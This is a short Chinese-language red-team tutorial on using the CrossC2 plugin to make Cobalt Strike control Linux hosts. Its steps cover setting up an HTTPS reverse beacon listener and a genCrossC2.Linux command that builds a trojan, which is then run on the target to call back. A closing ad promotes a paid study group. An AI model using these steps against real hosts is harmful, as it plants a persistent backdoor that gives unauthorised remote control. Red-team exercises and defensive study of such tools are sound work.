CobaltStrike上线Linux主机(CrossC2)
写在前面
在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢?
本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell,这得依赖于一个CobaltStrike的插件CrossC2。
CrossC2插件项目地址:https://github.com/gloxec/CrossC2
注:CrossC2项目官方声明只支持CobaltStrike3.14版本,本人亲测CobaltStrike4.0也可正常上线,但是无法执行其他操作。
1:首先,访问CrossC2项目地址,下载该项目。
将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。
2:将 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。
3:由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,
服务端开启监听 windows/beacon_https/reverse_https 类型的beacon
4:生成木马
./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test
5:执行木马上线
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
目前25000+人已关注加入我们